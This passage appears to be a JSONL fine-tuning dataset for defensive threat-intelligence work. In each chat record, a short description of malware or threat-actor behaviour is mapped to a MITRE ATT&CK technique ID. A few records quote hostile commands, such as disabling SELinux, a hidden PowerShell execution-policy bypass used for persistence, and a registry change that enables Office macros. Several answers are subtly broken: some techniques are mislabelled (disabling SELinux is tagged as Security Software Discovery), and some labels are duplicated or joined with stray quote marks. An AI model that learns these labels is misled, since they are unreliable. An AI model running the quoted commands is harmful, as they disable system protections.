description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers the Mac address, IP address, and the network adapter information from the victim’s machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Rclone \"chunker\" overlay supports splitting large files in smaller chunks during upload to circumvent size limits." }, { "role": "assistant", "content": "T1030 - Data Transfer Size Limits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can establish a LNK file in the startup folder for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The technique of having a signed, legitimate, executable load a malicious library is commonly referred to as side-loading, and has been witnessed in a number of campaigns and malware families in the past" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Egregor has been decrypted before execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay has used HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed has compressed collected data before exfiltration." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Catchamas gathers the Mac address, IP address, and the network adapter information from the victim’s machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CTU researchers have observed BRONZE PRESIDENT targeting multiple NGOs. The threat actors steal data from compromised systems over a long period of time, which likely indicates a long-term objective of monitoring the target's network. BRONZE PRESIDENT uses custom batch scripts to collect either specific file types (including files with .pptx, .xlsx, .pdf extensions) or all files within a specific location. CTU researchers also observed evidence that the threat actors collect credentials from high-privilege network accounts and reputationally sensitive accounts, such as social media and webmail accounts" }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR and RC4." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Green Lambert can establish persistence on a compromised host through modifying the `profile`, `login`, and run command (rc) files associated with the `bash`, `csh`, and `tcsh` shells." }, { "role": "assistant", "content": "T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Maze has injected the malware DLL into a target process." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remote shells on Unix & Windows clients have a real tty with all keyboard signals working just like an SSH shell" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Catchamas adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LockBit 2.0 has been known to self-propagate via SMB." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares', 'T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Patchwork has used spearphishing with an attachment to deliver files with exploits to initial victims." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to download and executes additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 compressed data into .zip files prior to exfiltrating it." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can gather information about TCP connection state." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A variant of encrypts some C2 with 3DES and RSA." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Sharpshooter, the threat actors relied on victims executing malicious Microsoft Word or PDF files." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti Group has used a program named ff.exe to search for specific documents on compromised hosts." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerShower has collected system information on the infected host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "communicates with its C2 servers through a TCP socket." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer collects the victim machine’s Windows GUID." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KOCTOPUS has executed a PowerShell command to download a file to the system." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT33 has used AES for encryption of command and control traffic." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In late July 2021, we identified an ongoing spear phishing campaign pushing Konni Rat to target Russia. Konni was first observed in the wild in 2014 and has been potentially linked to the North Korean APT group named APT37" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One version of Helminth uses a PowerShell script." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT33 has used password spraying to gain access to target systems." }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ABK has the ability to identify the installed anti-virus product on the compromised host." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obtains the victim's current time." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has used Remote Desktop Services on targeted systems." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the file /usr/sbin/setenforce exists, the malware executes the command, setenforce 0. This command configures the system’s Security-Enhanced Linux (SELinux) module, which provides support in the system's access control policies, into permissive mode — that is, setting the SELinux policy so that it is not enforced. If the system has the /etc/selinux/config file, it will write these commands into the file: SELINUX=disabled and SELINUXTYPE=targeted commands. The former disables the SELinux policy (or disallows one to be loaded), while the latter sets selected processes to run in confined domains" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has conducted spearphishing campaigns using malicious email attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment" }, { "role": "assistant", "content": "T1090 - Proxy', 'T1021.004 - Remote Services: SSH', 'T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JCry has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can download files and additional malware components." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors used dynamic DNS services for C2." }, { "role": "assistant", "content": "T1568 - Dynamic Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KOCTOPUS can delete created registry keys as part of its cleanup procedure." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "dumps usernames and passwords from Firefox, Internet Explorer, and Outlook." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 used DNS for C2 communications." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clop has checked the keyboard language using the GetKeyboardLayout() function to avoid installation on Russian-language or other Commonwealth of Independent States-language machines; it will also check the \"GetTextCharset\" function." }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obfuscates C2 traffic with variable 4-byte XOR keys." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RogueRobin uses a command prompt to run a PowerShell script from Excel. To assist in establishing persistence, RogueRobin creates \"%APPDATA%\\OneDrive.bat\" and saves the following string to it:\"powershell.exe -WindowStyle Hidden -exec bypass -File “%APPDATA%\\OneDrive.ps1”\"." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 installed a Delphi backdoor that used a custom algorithm for C2 communications." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After being extricated from the network, Dark Halo then returned a second time, exploiting a vulnerability in the organization's Microsoft Exchange Control Panel. Near the end of this incident, Volexity observed the threat actor using a novel technique to bypass Duo multi-factor authentication (MFA) to access the mailbox of a user via the organization's Outlook Web App (OWA) service. Finally, in a third incident, Dark Halo breached the organization by way of its SolarWinds Orion software in June and July 2020" }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has used Google Chrome browser extensions to infect victims and to steal passwords and cookies." }, { "role": "assistant", "content": "T1176 - Browser Extensions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers the OS version, CPU type, amount of RAM available from the victim’s machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These files can be parsed with lnk-parser to extract all contents" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sharpshooter's first-stage downloader installed Rising Sun to the startup folder \"%Startup%\\mssync.exe\"." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can use HTTP and HTTPS for command and control communication." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "captured screenshots and desktop video recordings." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EXOTIC LILY has used file-sharing services including WeTransfer, TransferNow, and OneDrive to deliver payloads." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete has used base64 encoding." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream has established persistence by running `sc.exe` and by setting the `WSearch` service to run automatically." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used WMIC to execute a remote XSL script to establish persistence." }, { "role": "assistant", "content": "T1220 - XSL Script Processing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RATANKBA gathers the victim’s IP address via the \"ipconfig -all\" command." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes and stores obfuscated Perl scripts." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MobileOrder has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CARROTBAT has the ability to delete downloaded files from a compromised host." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The crypter mainly contains junk code to increase entropy of the sample and hide the actual code. We have found 2 crypter variants with some code differences, but mostly with the same logic applied" }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can retrieve usernames from compromised hosts." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has used compromised accounts to send spearphishing emails." }, { "role": "assistant", "content": "T1586.002 - Email Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can communicate over HTTP, SMTP, and POP3 for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZLib creates Registry keys to allow itself to run as various services." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kazuar gathers information on local groups and members on the victim’s machine." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldMax has used decoy traffic to surround its malicious network traffic to avoid detection." }, { "role": "assistant", "content": "T1001.001 - Junk Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Honeybee, the threat actors had the ability to use FTP for C2." }, { "role": "assistant", "content": "T1071.002 - File Transfer Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "YAHOYAH uses HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has downloaded additional malware to execute on victim systems." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CharmPower can list the installed applications on a compromised host." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Both backdoors target Arabic-speaking users. They use code that checks if the compromised machine has the Arabic language installed" }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery', 'T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has cleared select event log entries." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GreyEnergy encrypts its configuration files with AES-256 and also encrypts its strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Gather the list of all files names listed in the Recent Items folder i.e. Appdata%\\Microsoft\\Windows\\Recent\". - Gather all names of files listed in the Desktop folder of the current user. Gather names of all files and programs listed in the Taskbar i.e. Get Microsoft Version Number from the registry, specifically from reg key/value: HKEY_CLASSES_ROOT\\Excel.Application\\CurVer||Default. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at: HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon execution, the “Windows Folder.exe” file copies itself to C:\\Users\\\\AppData\\Roaming and creates a Windows shortcut (LNK) file in the victim’s Startup directory as a persistence mechanism" }, { "role": "assistant", "content": "T1074 - Data Staged', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Darkhotel used embedded iframes on hotel login portals to redirect selected victims to download malware." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LitePower can identify installed AV software." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson can use a module to perform keylogging on compromised hosts." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EnvyScout contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk." }, { "role": "assistant", "content": "T1027.006 - HTML Smuggling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clears Windows PowerShell and WitnessClientAdmin log file." }, { "role": "assistant", "content": "T1070.003 - Indicator Removal on Host: Clear Command 